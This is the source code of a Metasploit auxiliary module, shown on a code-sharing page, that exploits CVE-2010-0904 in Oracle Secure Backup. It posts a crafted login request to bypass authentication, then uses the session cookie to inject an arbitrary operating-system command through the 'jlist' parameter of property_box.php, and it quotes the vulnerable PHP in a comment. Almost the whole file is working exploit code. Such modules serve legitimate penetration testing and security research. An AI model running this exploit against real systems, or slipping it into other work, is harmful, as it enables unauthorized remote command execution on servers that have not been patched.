Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize(info = {})
10
    super(update_info(info,
11
      'Name'           => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',
12
      'Description'    => %q{
13
          This module exploits an authentication bypass vulnerability
14
        in login.php in order to execute arbitrary code via a command injection
15
        vulnerability in property_box.php. This module was tested
16
        against Oracle Secure Backup version 10.3.0.1.0 (Win32).
17
      },
18
      'Author'         => [ 'MC' ],
19
      'License'        => MSF_LICENSE,
20
      'References'     =>
21
        [
22
          [ 'CVE', '2010-0904' ],
23
          [ 'OSVDB', '66338'],
24
          [ 'ZDI', '10-118' ],
25
        ],
26
      'DisclosureDate' => '2010-07-13'))
27

28
    register_options(
29
      [
30
        Opt::RPORT(443),
31
        OptString.new('CMD', [ false, "The command to execute.", "cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt" ]),
32
        OptBool.new('SSL',   [true, 'Use SSL', true]),
33
      ])
34
  end
35

36
  def run
37
    cmd = datastore['CMD']
38

39
    res = send_request_cgi(
40
      {
41
        'uri'	=>  '/login.php',
42
        'data'	=>  'attempt=1&uname=-',
43
        'method' => 'POST',
44
      }, 5)
45

46
      if res && res.get_cookies.match(/PHPSESSID=(.*);(.*)/i)
47

48
          print_status("Sending command: #{datastore['CMD']}...")
49

50
          send_request_cgi(
51
            {
52
              'uri'	=> '/property_box.php',
53
              'data'  => 'type=Job&jlist=' + Rex::Text.uri_encode('&' + cmd),
54
              'cookie' => res.get_cookies,
55
              'method' => 'POST',
56
            }, 5)
57

58
        print_status("Done.")
59
      else
60
        print_error("Invalid PHPSESSION token..")
61
        return
62
      end
63
  end
64
end
65
=begin
66
  else if (strcmp($type, "Job") == 0)
67
    {
68
    if (!is_array($objectname))
69
      $objectname = array();
70
    reset($objectname);
71
    while (list(,$oname) = each($objectname))
72
      {
73
      $oname = escapeshellarg($oname);
74
      $jlist = "$jlist $oname";
75
      }
76
    if (strlen($jlist) > 0)
77
      $msg = exec_qr("$rbtool lsjob -lrRLC $jlist");
78
=end
79

80